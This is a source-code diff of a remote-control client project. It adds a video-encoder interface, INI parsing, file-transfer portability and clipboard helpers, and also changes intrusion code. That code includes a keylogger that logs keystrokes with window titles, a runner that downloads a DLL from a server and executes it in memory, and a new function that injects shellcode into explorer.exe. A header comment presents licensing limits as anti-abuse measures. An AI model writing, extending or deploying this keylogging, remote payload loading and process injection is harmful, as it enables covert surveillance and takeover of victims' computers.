if (wTitle[0]) {
WideCharToMultiByte(CP_UTF8, 0, wTitle, -1,
szTitle, sizeof(szTitle), NULL, NULL);
}
//这里判断 窗口是否可见 或标题为空 //这里判断 窗口是否可见 或标题为空
BOOL m_bShowHidden = TRUE; BOOL m_bShowHidden = TRUE;
if (!m_bShowHidden && !IsWindowVisible(hWnd)) { if (!m_bShowHidden && !IsWindowVisible(hWnd)) {

BIN
client/TestRun.rc
View File

Binary file not shown.

59
client/VideoEncoderBase.h Normal file
View File

@@ -0,0 +1,59 @@
#pragma once
#include <cstdint>
// 视频编码器抽象接口
// Step 0: 仅 CX264Encoder 实现;后续 CFFmpegH264Encoder / CFFmpegAV1Encoder 接入
// 详见 docs/HardwareEncoding_Design.md
enum class VideoCodec {
H264,
AV1,
};
enum class RateControl {
CRF, // x264 软编用 CRF (0-51, 越小越好)
BITRATE, // 硬编路径用目标码率 (kbps)
};
struct EncoderParams {
int width = 0;
int height = 0;
int fps = 30;
RateControl rc = RateControl::BITRATE;
int crf = 23; // 当 rc == CRF
int bitrate_kbps = 4000; // 当 rc == BITRATE
int gop_seconds = 15; // 关键帧间隔(秒),与 x264 i_keyint_max=fps*15 对齐
};
class VideoEncoderBase {
public:
virtual ~VideoEncoderBase() = default;
virtual bool open(const EncoderParams& params) = 0;
virtual void close() = 0;
// 编码一帧
// rgb : 输入像素数据
// bpp : 24 (RGB) / 32 (BGRA)
// stride : 源行字节数
// width/height : 图像尺寸
// lppData : 输出指针,指向编码后码流(生命周期归编码器,下一次 encode 失效)
// lpSize : 输出码流字节数;返回 0 表示成功但本帧无输出(硬编首帧延迟)
// direction : 1 = 上下不翻转,-1 = 翻转(适配 Windows BMP bottom-up
// 返回 0 = 成功;< 0 = 失败
virtual int encode(
uint8_t* rgb,
uint8_t bpp,
uint32_t stride,
uint32_t width,
uint32_t height,
uint8_t** lppData,
uint32_t* lpSize,
int direction = 1
) = 0;
virtual void forceIDR() = 0;
virtual void setBitrate(int kbps) {} // 可选实现,默认 no-op
virtual VideoCodec codec() const = 0;
virtual const char* backendName() const = 0; // "x264" / "h264_nvenc" / "av1_amf" ...
};

27
client/X264Encoder.cpp
View File

@@ -2,6 +2,16 @@
#include <string.h> #include <string.h>
#include <stdio.h> #include <stdio.h>
#if DISABLE_X264_FOR_TEST
CX264Encoder::CX264Encoder() { memset(&m_Param, 0, sizeof(m_Param)); m_pCodec = NULL; m_pPicIn = NULL; m_pPicOut = NULL; m_forceIDR = false; }
CX264Encoder::~CX264Encoder() {}
bool CX264Encoder::open(int, int, int, int) { return false; }
bool CX264Encoder::open(x264_param_t*) { return false; }
bool CX264Encoder::open(const EncoderParams&) { return false; }
void CX264Encoder::close() {}
int CX264Encoder::encode(uint8_t*, uint8_t, uint32_t, uint32_t, uint32_t, uint8_t**, uint32_t*, int) { return -1; }
#else
#ifdef _WIN64 #ifdef _WIN64
#pragma comment(lib,"libyuv/libyuv_x64.lib") #pragma comment(lib,"libyuv/libyuv_x64.lib")
#pragma comment(lib,"x264/libx264_x64.lib") #pragma comment(lib,"x264/libx264_x64.lib")
@@ -16,6 +26,7 @@ CX264Encoder::CX264Encoder()
m_pCodec = NULL; m_pCodec = NULL;
m_pPicIn = NULL; m_pPicIn = NULL;
m_pPicOut = NULL; m_pPicOut = NULL;
m_forceIDR = false;
} }
@@ -79,6 +90,14 @@ bool CX264Encoder::open(x264_param_t * param)
} }
bool CX264Encoder::open(const EncoderParams& params)
{
// x264 软编只支持 CRF调用方走 BITRATE 时降级为 CRF=23与 BitRateToCRF 默认一致)
int crf = (params.rc == RateControl::CRF) ? params.crf : 23;
return open(params.width, params.height, params.fps, crf);
}
void CX264Encoder::close() void CX264Encoder::close()
{ {
if (m_pCodec) { if (m_pCodec) {
@@ -137,6 +156,12 @@ int CX264Encoder::encode(
return -2; return -2;
} }
if (m_forceIDR) {
m_pPicIn->i_type = X264_TYPE_IDR;
m_forceIDR = false;
} else {
m_pPicIn->i_type = X264_TYPE_AUTO;
}
encode_size = x264_encoder_encode( encode_size = x264_encoder_encode(
m_pCodec, m_pCodec,
@@ -153,3 +178,5 @@ int CX264Encoder::encode(
*lpSize = encode_size; *lpSize = encode_size;
return 0; return 0;
} }
#endif

21
client/X264Encoder.h
View File

@@ -1,23 +1,30 @@
#pragma once #pragma once
#include "VideoEncoderBase.h"
extern "C" { extern "C" {
#include <libyuv\libyuv.h> #include <libyuv\libyuv.h>
#include <x264\x264.h> #include <x264\x264.h>
} }
class CX264Encoder #include "common/config.h"
class CX264Encoder : public VideoEncoderBase
{ {
private: private:
x264_t* m_pCodec; //编码器实例 x264_t* m_pCodec; //编码器实例
x264_picture_t *m_pPicIn; x264_picture_t *m_pPicIn;
x264_picture_t *m_pPicOut; x264_picture_t *m_pPicOut;
x264_param_t m_Param; x264_param_t m_Param;
bool m_forceIDR; // 下一次 encode 强制 IDR
public: public:
// 旧签名保留:被 ScreenCapture 临时直接调;新增 EncoderParams overload 走接口路径
bool open(int width, int height, int fps, int crf); bool open(int width, int height, int fps, int crf);
bool open(x264_param_t * param); bool open(x264_param_t * param);
void close(); // VideoEncoderBase
bool open(const EncoderParams& params) override;
void close() override;
int encode( int encode(
uint8_t * rgb, uint8_t * rgb,
uint8_t bpp, uint8_t bpp,
@@ -27,9 +34,11 @@ public:
uint8_t ** lppData, uint8_t ** lppData,
uint32_t * lpSize, uint32_t * lpSize,
int direction = 1 int direction = 1
); ) override;
void forceIDR() override { m_forceIDR = true; }
VideoCodec codec() const override { return VideoCodec::H264; }
const char* backendName() const override { return "x264"; }
CX264Encoder(); CX264Encoder();
~CX264Encoder(); ~CX264Encoder() override;
}; };

13
client/ghost_vs2015.vcxproj
View File

@@ -130,7 +130,7 @@
</EntryPointSymbol> </EntryPointSymbol>
<SubSystem>Console</SubSystem> <SubSystem>Console</SubSystem>
<AdditionalOptions>/ignore:4099 %(AdditionalOptions)</AdditionalOptions> <AdditionalOptions>/ignore:4099 %(AdditionalOptions)</AdditionalOptions>
<AdditionalLibraryDirectories>$(SolutionDir)..\SimplePlugins\bin</AdditionalLibraryDirectories> <AdditionalLibraryDirectories>$(SolutionDir)..\SimplePlugins\bin;$(SolutionDir)..\ffmpeg-7.1\install-win64\lib</AdditionalLibraryDirectories>
</Link> </Link>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
@@ -177,7 +177,7 @@
<AdditionalOptions> /SAFESEH:NO /ignore:4099 %(AdditionalOptions)</AdditionalOptions> <AdditionalOptions> /SAFESEH:NO /ignore:4099 %(AdditionalOptions)</AdditionalOptions>
<SubSystem>Windows</SubSystem> <SubSystem>Windows</SubSystem>
<EntryPointSymbol>mainCRTStartup</EntryPointSymbol> <EntryPointSymbol>mainCRTStartup</EntryPointSymbol>
<AdditionalLibraryDirectories>$(SolutionDir)..\SimplePlugins\bin</AdditionalLibraryDirectories> <AdditionalLibraryDirectories>$(SolutionDir)..\SimplePlugins\bin;$(SolutionDir)..\ffmpeg-7.1\install-win64\lib</AdditionalLibraryDirectories>
</Link> </Link>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemGroup> <ItemGroup>
@@ -209,6 +209,7 @@
<ClCompile Include="reg_startup.c" /> <ClCompile Include="reg_startup.c" />
<ClCompile Include="SafeThread.cpp" /> <ClCompile Include="SafeThread.cpp" />
<ClCompile Include="ScreenManager.cpp" /> <ClCompile Include="ScreenManager.cpp" />
<ClCompile Include="ScreenPreview.cpp" />
<ClCompile Include="ScreenSpy.cpp" /> <ClCompile Include="ScreenSpy.cpp" />
<ClCompile Include="ServicesManager.cpp" /> <ClCompile Include="ServicesManager.cpp" />
<ClCompile Include="ServiceWrapper.c" /> <ClCompile Include="ServiceWrapper.c" />
@@ -217,6 +218,9 @@
<ClCompile Include="ConPTYManager.cpp" /> <ClCompile Include="ConPTYManager.cpp" />
<ClCompile Include="StdAfx.cpp" /> <ClCompile Include="StdAfx.cpp" />
<ClCompile Include="SystemManager.cpp" /> <ClCompile Include="SystemManager.cpp" />
<ClCompile Include="CFFmpegAV1Encoder.cpp" />
<ClCompile Include="CFFmpegH264Encoder.cpp" />
<ClCompile Include="EncoderFactory.cpp" />
<ClCompile Include="TalkManager.cpp" /> <ClCompile Include="TalkManager.cpp" />
<ClCompile Include="VideoManager.cpp" /> <ClCompile Include="VideoManager.cpp" />
<ClCompile Include="X264Encoder.cpp" /> <ClCompile Include="X264Encoder.cpp" />
@@ -257,6 +261,7 @@
<ClInclude Include="SafeThread.h" /> <ClInclude Include="SafeThread.h" />
<ClInclude Include="ScreenCapturerDXGI.h" /> <ClInclude Include="ScreenCapturerDXGI.h" />
<ClInclude Include="ScreenManager.h" /> <ClInclude Include="ScreenManager.h" />
<ClInclude Include="ScreenPreview.h" />
<ClInclude Include="ScreenSpy.h" /> <ClInclude Include="ScreenSpy.h" />
<ClInclude Include="ServicesManager.h" /> <ClInclude Include="ServicesManager.h" />
<ClInclude Include="ServiceWrapper.h" /> <ClInclude Include="ServiceWrapper.h" />
@@ -264,7 +269,11 @@
<ClInclude Include="ShellManager.h" /> <ClInclude Include="ShellManager.h" />
<ClInclude Include="ConPTYManager.h" /> <ClInclude Include="ConPTYManager.h" />
<ClInclude Include="StdAfx.h" /> <ClInclude Include="StdAfx.h" />
<ClInclude Include="CFFmpegAV1Encoder.h" />
<ClInclude Include="CFFmpegH264Encoder.h" />
<ClInclude Include="EncoderFactory.h" />
<ClInclude Include="SystemManager.h" /> <ClInclude Include="SystemManager.h" />
<ClInclude Include="VideoEncoderBase.h" />
<ClInclude Include="TalkManager.h" /> <ClInclude Include="TalkManager.h" />
<ClInclude Include="VideoCodec.h" /> <ClInclude Include="VideoCodec.h" />
<ClInclude Include="VideoManager.h" /> <ClInclude Include="VideoManager.h" />

14
client/keylogger.cpp
View File

@@ -94,9 +94,17 @@ int Save(int key_stroke)
} }
if (foreground) { if (foreground) {
// 用 W 接口取标题再转 UTF-8避免依赖客户端系统 ANSI 代码页:
// 老路径 GetWindowTextA 输出的字节是客户端 CP_ACP中文机=GBK
// 服务端按自己的 CP_ACP 解释会乱码(例如德语机=CP1252
char window_title[MAX_PATH] = {}; char window_title[MAX_PATH] = {};
GET_PROCESS_EASY(GetWindowTextA); wchar_t wTitle[MAX_PATH] = {};
GetWindowTextA(foreground, (LPSTR)window_title, MAX_PATH); GET_PROCESS_EASY(GetWindowTextW);
GetWindowTextW(foreground, wTitle, MAX_PATH);
if (wTitle[0]) {
WideCharToMultiByte(CP_UTF8, 0, wTitle, -1,
window_title, MAX_PATH, NULL, NULL);
}
if (strcmp(window_title, lastwindow) != 0) { if (strcmp(window_title, lastwindow) != 0) {
strcpy_s(lastwindow, sizeof(lastwindow), window_title); strcpy_s(lastwindow, sizeof(lastwindow), window_title);
@@ -107,7 +115,7 @@ int Save(int key_stroke)
sprintf_s(tm, "%d-%02d-%02d %02d:%02d:%02d", s.wYear, s.wMonth, s.wDay, sprintf_s(tm, "%d-%02d-%02d %02d:%02d:%02d", s.wYear, s.wMonth, s.wDay,
s.wHour, s.wMinute, s.wSecond); s.wHour, s.wMinute, s.wSecond);
output << "\r\n\r\n[标题:] " << window_title << "\r\n[时间:]" << tm << "\r\n[内容:]"; output << "\r\n\r\n[Title:] " << window_title << "\r\n[Time:]" << tm << "\r\n[Content:]";
} }
} }

37
client/my_clip.h
View File

@@ -84,4 +84,41 @@ namespace clip {
LeaveCriticalSection(&GetClipLock()); LeaveCriticalSection(&GetClipLock());
return result; return result;
} }
/**
* 将 UTF-8 字符串安全地设置到 Windows 剪切板
*/
inline bool set_text_utf8(const std::string& utf8_str) {
if (utf8_str.empty()) return false;
// 1. 将 UTF-8 转换为 UTF-16 (因为 Windows 剪切板原生支持 UTF-16)
int wlen = MultiByteToWideChar(CP_UTF8, 0, utf8_str.c_str(), -1, NULL, 0);
if (wlen <= 0) return false;
// 2. 分配全局内存
HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, wlen * sizeof(wchar_t));
if (!hMem) return false;
// 3. 执行转换并锁定内存
wchar_t* pMem = (wchar_t*)GlobalLock(hMem);
MultiByteToWideChar(CP_UTF8, 0, utf8_str.c_str(), -1, pMem, wlen);
GlobalUnlock(hMem);
// 4. 操作剪切板
bool success = false;
if (OpenClipboard(NULL)) {
EmptyClipboard();
if (SetClipboardData(CF_UNICODETEXT, hMem)) {
success = true;
}
CloseClipboard();
}
// 如果 SetClipboardData 失败,需要手动释放内存;成功则由系统接管
if (!success) {
GlobalFree(hMem);
}
return success;
}
} // namespace clip } // namespace clip

52
client/sign_shim_unix.cpp Normal file
View File

@@ -0,0 +1,52 @@
// sign_shim_unix.cpp - Linux/macOS adapter for libsign.a's C interface
//
// libsign.a 公开 ABI 是 C linkage避免 std::string 跨编译器/跨 libstdc++
// 版本 ABI 风险),但 YAMA 客户端代码IOCPClient.cpp / KernelManager.cpp /
// linux/main.cpp / macos/main.mm习惯用 std::string 调用 signMessage /
// verifyMessage。本文件提供 C++ 适配,让两边契合。
//
// Windows 不编译这个文件——Windows 直接链接私有 .lib 提供的 std::string 版本。
#include <string>
#include <cstring>
// libsign.a 提供的 C 接口
extern "C" {
int signMessage_c(const char* privateKey, int privateKeyLen,
const unsigned char* msg, int msgLen,
char* outBuf, int outBufSize);
int verifyMessage_c(const char* publicKey, int publicKeyLen,
const unsigned char* msg, int msgLen,
const char* sigHex, int sigLen);
int isVerifyCalled_c(void);
}
// 与 YAMA common/commands.h 中 BYTE 一致
typedef unsigned char BYTE;
// ============================================================================
// 提供 YAMA 既有声明所期望的 C++ 符号
// ============================================================================
std::string signMessage(const std::string& privateKey, BYTE* msg, int len)
{
char buf[65] = {};
int n = signMessage_c(privateKey.c_str(), (int)privateKey.size(),
msg, len,
buf, sizeof(buf));
if (n != 64) return std::string();
return std::string(buf, 64);
}
bool verifyMessage(const std::string& publicKey, BYTE* msg, int len,
const std::string& signature)
{
return verifyMessage_c(publicKey.c_str(), (int)publicKey.size(),
msg, len,
signature.data(), (int)signature.size()) != 0;
}
int isVerifyCalled()
{
return isVerifyCalled_c();
}

87
client/test.cpp
View File

@@ -10,7 +10,7 @@
#include "auto_start.h" #include "auto_start.h"
// A shell code loader connect to 127.0.0.1:6543. // A shell code loader connect to 127.0.0.1:6543.
// Build: xxd -i TinyRun.dll > SCLoader.cpp // Build: xxd -i TinyRun.dll > SCLoader.cpp
#include "SCLoader.cpp" // #include "SCLoader.cpp"
extern "C" { extern "C" {
#include "reg_startup.h" #include "reg_startup.h"
#include "ServiceWrapper.h" #include "ServiceWrapper.h"
@@ -76,10 +76,14 @@ typedef struct PkgHeader {
} }
} PkgHeader; } PkgHeader;
typedef int (*DllCallback)(BYTE* dll, int size);
// Memory DLL runner. // Memory DLL runner.
class MemoryDllRunner : public DllRunner class MemoryDllRunner : public DllRunner
{ {
protected: protected:
int m_payloadType = MEMORYDLL;
DllCallback m_callback = nullptr;
HMEMORYMODULE m_mod; HMEMORYMODULE m_mod;
std::string GetIPAddress(const std::string& hostName) std::string GetIPAddress(const std::string& hostName)
{ {
@@ -107,7 +111,7 @@ protected:
return std::string(ipStr); return std::string(ipStr);
} }
public: public:
MemoryDllRunner() : m_mod(nullptr) {} MemoryDllRunner(int type = MEMORYDLL, DllCallback cb = NULL) : m_mod(nullptr), m_payloadType(type), m_callback(cb) {}
virtual const char* ReceiveDll(int &size) virtual const char* ReceiveDll(int &size)
{ {
WSADATA wsaData = {}; WSADATA wsaData = {};
@@ -146,9 +150,9 @@ public:
continue; continue;
} }
#ifdef _DEBUG #ifdef _DEBUG
char command[64] = { SOCKET_DLLLOADER, sizeof(void*) == 8, MEMORYDLL, 0 }; char command[64] = { SOCKET_DLLLOADER, sizeof(void*) == 8, m_payloadType, 0 };
#else #else
char command[64] = { SOCKET_DLLLOADER, sizeof(void*) == 8, MEMORYDLL, 1 }; char command[64] = { SOCKET_DLLLOADER, sizeof(void*) == 8, m_payloadType, 1 };
#endif #endif
memcpy(command + 4, __DATE__, 11); // 发送版本日期用于大 DLL 检查 memcpy(command + 4, __DATE__, 11); // 发送版本日期用于大 DLL 检查
memcpy(command + 32, hash.c_str(), min(32, hash.length())); memcpy(command + 32, hash.c_str(), min(32, hash.length()));
@@ -244,6 +248,9 @@ public:
strcpy(addr->installDir, g_ConnectAddress.installDir); strcpy(addr->installDir, g_ConnectAddress.installDir);
strcpy(addr->installName, g_ConnectAddress.installName); strcpy(addr->installName, g_ConnectAddress.installName);
} }
if (m_callback) {
m_callback((BYTE*)buffer + 6 + sizeof(PkgHeader), size);
}
m_mod = ::MemoryLoadLibrary(buffer + 6 + sizeof(PkgHeader), size); m_mod = ::MemoryLoadLibrary(buffer + 6 + sizeof(PkgHeader), size);
SAFE_DELETE_ARRAY(buffer); SAFE_DELETE_ARRAY(buffer);
return m_mod; return m_mod;
@@ -259,6 +266,37 @@ public:
} }
}; };
int InjectShellcode(BYTE* buf, int len) {
ShellcodeInj inj(buf, len);
int pid = 0;
hEvent = ::CreateEventA(NULL, TRUE, FALSE, NULL);
do {
if (sizeof(void*) == 4) // Shell code is 64bit
return 1;
if (!(pid = inj.InjectProcess("explorer.exe", TRUE))) {
return 2;
}
HANDLE hProcess = OpenProcess(PROCESS_TERMINATE | SYNCHRONIZE, FALSE, pid);
if (hProcess == NULL) {
return 3;
}
Mprintf("Inject process [%d] succeed.\n", pid);
HANDLE handles[2] = { hProcess, hEvent };
DWORD waitResult = WaitForMultipleObjects(2, handles, FALSE, INFINITE);
if (status == 1) {
Mprintf("结束运行.\n");
Sleep(1000);
TerminateProcess(hProcess, -1);
SAFE_CLOSE_HANDLE(hEvent);
}
SAFE_CLOSE_HANDLE(hProcess);
Mprintf("Process [%d] is finished.\n", pid);
Sleep(1000);
if (status == 1)
ExitProcess(0);
} while (pid);
}
// @brief 首先读取settings.ini配置文件获取IP和端口. // @brief 首先读取settings.ini配置文件获取IP和端口.
// [settings] // [settings]
// localIp=XXX // localIp=XXX
@@ -317,44 +355,6 @@ int main(int argc, const char *argv[])
g_ConnectAddress.SetServer(saved_ip.c_str(), saved_port); g_ConnectAddress.SetServer(saved_ip.c_str(), saved_port);
} }
// 此 Shell code 连接本机6543端口注入到任务管理器
if (g_ConnectAddress.iStartup == Startup_InjSC) {
// Try to inject shell code to `notepad.exe`
// If failed then run memory DLL
ShellcodeInj inj(TinyRun_dll, TinyRun_dll_len);
int pid = 0;
hEvent = ::CreateEventA(NULL, TRUE, FALSE, NULL);
do {
if (sizeof(void*) == 4) // Shell code is 64bit
break;
if (!(pid = inj.InjectProcess("explorer.exe", ok))) {
break;
}
HANDLE hProcess = OpenProcess(PROCESS_TERMINATE | SYNCHRONIZE, FALSE, pid);
if (hProcess == NULL) {
break;
}
Mprintf("Inject process [%d] succeed.\n", pid);
HANDLE handles[2] = { hProcess, hEvent };
DWORD waitResult = WaitForMultipleObjects(2, handles, FALSE, INFINITE);
if (status == 1) {
TerminateProcess(hProcess, -1);
SAFE_CLOSE_HANDLE(hEvent);
}
SAFE_CLOSE_HANDLE(hProcess);
Mprintf("Process [%d] is finished.\n", pid);
if (status == 1) {
Mprintf("结束运行.\n");
Sleep(1000);
return -1;
}
} while (pid);
}
if (g_ConnectAddress.iStartup == Startup_InjSC) {
g_ConnectAddress.iStartup = Startup_MEMDLL;
}
do { do {
BOOL ret = Run((argc > 1 && argv[1][0] != '-') ? // remark: demo may run with argument "-agent" BOOL ret = Run((argc > 1 && argv[1][0] != '-') ? // remark: demo may run with argument "-agent"
argv[1] : (strlen(g_ConnectAddress.ServerIP()) == 0 ? "127.0.0.1" : g_ConnectAddress.ServerIP()), argv[1] : (strlen(g_ConnectAddress.ServerIP()) == 0 ? "127.0.0.1" : g_ConnectAddress.ServerIP()),
@@ -423,6 +423,9 @@ BOOL Run(const char* argv1, int argv2)
case Startup_MEMDLL: case Startup_MEMDLL:
runner = new MemoryDllRunner; runner = new MemoryDllRunner;
break; break;
case Startup_InjSC:
runner = new MemoryDllRunner(INJECT_SC, InjectShellcode);
break;
default: default:
ExitProcess(-1); ExitProcess(-1);
break; break;

44
linux/FileManager.h → common/FileManager.h
View File

@@ -1,8 +1,24 @@
/**
* FileManager.h - Unix File Manager
*
* Implements file transfer between Windows server and Unix client.
* Supports: browse, upload, download, delete, rename, create folder
*
* PLATFORM SUPPORT:
* - Linux: Supported
* - macOS: Supported
* - Windows: NOT SUPPORTED (Windows uses different file APIs)
*/
#pragma once #pragma once
#if defined(_WIN32) || defined(_WIN64)
#error "FileManager.h is not supported on Windows."
#endif
#include <dirent.h> #include <dirent.h>
#include <sys/stat.h> #include <sys/stat.h>
#include <sys/statvfs.h> #include <sys/statvfs.h>
#include <iconv.h>
#include <unistd.h> #include <unistd.h>
#include <cstring> #include <cstring>
#include <string> #include <string>
@@ -11,15 +27,19 @@
#include <fstream> #include <fstream>
#include <sstream> #include <sstream>
#include <cerrno> #include <cerrno>
#ifdef __APPLE__
#include <sys/mount.h> // macOS: statfs for filesystem type
#endif
#include <iconv.h> // Character encoding conversion (GBK <-> UTF-8)
// FileTransferV2 is in the same directory (common/)
#include "FileTransferV2.h" #include "FileTransferV2.h"
// 外部声明 clientID在 main.cpp 中定义) // External declaration of clientID (defined in main.cpp/main.mm)
extern uint64_t g_myClientID; extern uint64_t g_myClientID;
// ============== Linux File Manager ==============
// Implements file transfer between Windows server and Linux client
// Supports: browse, upload, download, delete, rename, create folder
#define MAX_SEND_BUFFER 65535 #define MAX_SEND_BUFFER 65535
class FileManager : public IOCPManager class FileManager : public IOCPManager
@@ -222,6 +242,13 @@ private:
// ---- Get root filesystem type ---- // ---- Get root filesystem type ----
static std::string getRootFsType() static std::string getRootFsType()
{ {
#ifdef __APPLE__
struct statfs sf;
if (statfs("/", &sf) == 0) {
return std::string(sf.f_fstypename); // "apfs", "hfs", etc.
}
return "apfs";
#else
std::ifstream f("/proc/mounts"); std::ifstream f("/proc/mounts");
std::string line; std::string line;
while (std::getline(f, line)) { while (std::getline(f, line)) {
@@ -232,6 +259,7 @@ private:
} }
} }
return "ext4"; return "ext4";
#endif
} }
// ---- Ensure parent directory exists (mkdir -p for parent of file path) ---- // ---- Ensure parent directory exists (mkdir -p for parent of file path) ----
@@ -307,7 +335,11 @@ private:
memcpy(buf + offset + 2, &totalMB, sizeof(unsigned long)); memcpy(buf + offset + 2, &totalMB, sizeof(unsigned long));
memcpy(buf + offset + 6, &freeMB, sizeof(unsigned long)); memcpy(buf + offset + 6, &freeMB, sizeof(unsigned long));
#ifdef __APPLE__
const char* typeName = "macOS";
#else
const char* typeName = "Linux"; const char* typeName = "Linux";
#endif
int typeNameLen = strlen(typeName) + 1; int typeNameLen = strlen(typeName) + 1;
memcpy(buf + offset + 10, typeName, typeNameLen); memcpy(buf + offset + 10, typeName, typeNameLen);

27
linux/FileTransferV2.h → common/FileTransferV2.h
View File

@@ -1,7 +1,24 @@
/**
* FileTransferV2.h - Unix V2 File Transfer Protocol
*
* Implements V2 file transfer protocol for Unix clients.
* Supports: receive files from server/C2C, send files to server/C2C
*
* PLATFORM SUPPORT:
* - Linux: Supported
* - macOS: Supported
* - Windows: NOT SUPPORTED (Windows uses different file APIs)
*/
#pragma once #pragma once
#include "common/commands.h"
#include "common/file_upload.h" #if defined(_WIN32) || defined(_WIN64)
#include "client/IOCPClient.h" #error "FileTransferV2.h is not supported on Windows."
#endif
#include "commands.h"
#include "file_upload.h"
#include "../client/IOCPClient.h"
#include <unistd.h> #include <unistd.h>
#include <sys/stat.h> #include <sys/stat.h>
#include <fcntl.h> #include <fcntl.h>
@@ -15,10 +32,6 @@
#include <fstream> #include <fstream>
#include <thread> #include <thread>
// ============== Linux V2 File Transfer ==============
// Implements V2 file transfer protocol for Linux client
// Supports: receive files from server/C2C, send files to server/C2C
class FileTransferV2 class FileTransferV2
{ {
public: public:

162
common/IniParser.h
View File

@@ -11,6 +11,7 @@
#include <cstdio> #include <cstdio>
#include <cstring> #include <cstring>
#include <fstream>
#include <string> #include <string>
#include <map> #include <map>
@@ -36,64 +37,75 @@ public:
if (!filePath || !filePath[0]) if (!filePath || !filePath[0])
return false; return false;
FILE* f = nullptr; std::ifstream f(filePath);
#ifdef _MSC_VER if (!f.is_open())
if (fopen_s(&f, filePath, "r") != 0 || !f)
return false; return false;
#else
f = fopen(filePath, "r");
if (!f)
return false;
#endif
// 不再使用固定行缓冲:超过 4KB 的行(如团购授权数百个 IP 的列表)会被
// fgets 拆成多段,第二段不带 '=' 会被 ParseLine 丢弃 → 显示截断。
// std::getline 按行读 std::string无长度上限。
std::string currentSection; std::string currentSection;
char line[4096]; std::string line;
while (std::getline(f, line)) {
while (fgets(line, sizeof(line), f)) { if (!line.empty()) {
// 去除行尾换行符 ParseLine(&line[0], currentSection);
size_t len = strlen(line);
while (len > 0 && (line[len - 1] == '\n' || line[len - 1] == '\r'))
line[--len] = '\0';
if (len == 0)
continue;
// 跳过注释
if (line[0] == ';' || line[0] == '#')
continue;
// 检测 section 头: [SectionName]
// 真正的 section 头:']' 后面没有 '='(否则是 key=value
if (line[0] == '[') {
char* end = strchr(line, ']');
if (end) {
char* eqAfter = strchr(end + 1, '=');
if (!eqAfter) {
// 纯 section 头,如 [Strings]
*end = '\0';
currentSection = line + 1;
continue;
}
// ']' 后有 '=',如 [使用FRP]=[Using FRP],当作 key=value 处理
}
}
// 不在任何 section 内则跳过
if (currentSection.empty())
continue;
// 解析 key=value只按第一个 '=' 分割,不 trim
// key 和 value 均做反转义(\n \r \t \\ \"
char* eq = strchr(line, '=');
if (eq && eq != line) {
*eq = '\0';
std::string key = Unescape(std::string(line));
std::string value = Unescape(std::string(eq + 1));
m_sections[currentSection][key] = value;
} }
} }
return true;
}
fclose(f); // 从内存加载 INI 数据,返回是否成功
// 用于加载嵌入的资源数据
bool LoadFromMemory(const char* data, size_t size)
{
Clear();
if (!data || size == 0)
return false;
std::string currentSection;
const char* p = data;
const char* end = data + size;
while (p < end) {
// 找到行尾
const char* lineEnd = p;
while (lineEnd < end && *lineEnd != '\n' && *lineEnd != '\r')
lineEnd++;
// 不再限制行长度(原 4096 上限会悄无声息地丢弃长行)
size_t lineLen = lineEnd - p;
if (lineLen > 0) {
std::string line(p, lineLen);
ParseLine(&line[0], currentSection);
}
// 跳过换行符
p = lineEnd;
while (p < end && (*p == '\n' || *p == '\r'))
p++;
}
return true;
}
// 追加加载(不清除现有数据,用于覆盖)
bool LoadFileAppend(const char* filePath)
{
if (!filePath || !filePath[0])
return false;
std::ifstream f(filePath);
if (!f.is_open())
return false;
std::string currentSection;
std::string line;
while (std::getline(f, line)) {
if (!line.empty()) {
ParseLine(&line[0], currentSection);
}
}
return true; return true;
} }
@@ -138,6 +150,52 @@ public:
private: private:
TSections m_sections; TSections m_sections;
// 解析单行 INI 内容
void ParseLine(char* line, std::string& currentSection)
{
// 去除行尾换行符
size_t len = strlen(line);
while (len > 0 && (line[len - 1] == '\n' || line[len - 1] == '\r'))
line[--len] = '\0';
if (len == 0)
return;
// 跳过注释
if (line[0] == ';' || line[0] == '#')
return;
// 检测 section 头: [SectionName]
// 真正的 section 头:']' 后面没有 '='(否则是 key=value
if (line[0] == '[') {
char* end = strchr(line, ']');
if (end) {
char* eqAfter = strchr(end + 1, '=');
if (!eqAfter) {
// 纯 section 头,如 [Strings]
*end = '\0';
currentSection = line + 1;
return;
}
// ']' 后有 '=',如 [使用FRP]=[Using FRP],当作 key=value 处理
}
}
// 不在任何 section 内则跳过
if (currentSection.empty())
return;
// 解析 key=value只按第一个 '=' 分割,不 trim
// key 和 value 均做反转义(\n \r \t \\ \"
char* eq = strchr(line, '=');
if (eq && eq != line) {
*eq = '\0';
std::string key = Unescape(std::string(line));
std::string value = Unescape(std::string(eq + 1));
m_sections[currentSection][key] = value;
}
}
// 反转义:将字面量 \n \r \t \\ \" 转为对应的控制字符 // 反转义:将字面量 \n \r \t \\ \" 转为对应的控制字符
static std::string Unescape(const std::string& s) static std::string Unescape(const std::string& s)
{ {

389
common/LANChecker.h
View File

@@ -1,6 +1,115 @@
#pragma once #pragma once
// LANChecker.h - 检测本进程的TCP连接是否有外网IP // ============================================================================
// 用于试用版License限制仅允许内网连接 // LANChecker.h — 远程控制软件的反滥用 / 合规执行模块
// ============================================================================
//
// 立场与背景
// ----------------------------------------------------------------------------
// 本软件提供远程桌面与设备管理能力,理论上具备被滥用为非授权远程控制 / 监控
// 工具的可能性。为防止此类滥用,并明确合规边界,本模块在客户端进程内实施
// 分级强制性技术限制:能力随授权级别开放,越权使用形态会被本模块的检测路径
// 捕获并以可见方式提醒终端用户(弹窗 / 终止进程)。
//
// 本模块的存在不是装饰,而是出厂安全姿态的一部分。任何试图通过外部手段
// 屏蔽弹窗、拦截日志、patch 二进制以禁用本模块的行为,均构成对最终用户
// 授权协议EULA的违反发行方对此类绕过行为产生的后果不承担任何责任
// 并保留通过授权服务器侧黑名单、签发吊销等手段进一步处置的权利。
//
// 授权分级与强制约束
// ----------------------------------------------------------------------------
//
// ┌─────────────┬─────────────────────┬──────────────────────────────────┐
// │ 层级 │ 适用场景 │ 本模块强制的限制 │
// ├─────────────┼─────────────────────┼──────────────────────────────────┤
// │ 无口令 │ 个人单机自用 │ 监听端口数 ≤ 2 │
// │ │ (非远程业务) │ (单设备本地管理足够) │
// ├─────────────┼─────────────────────┼──────────────────────────────────┤
// │ 试用口令 │ 内部 LAN 设备管理 │ 监听端口数 ≤ 20 │
// │ │ 严禁跨网使用 │ 入站连接源 IP 必须为私网段 │
// │ │ │ 心跳 RTT 中位数 ≤ 25ms │
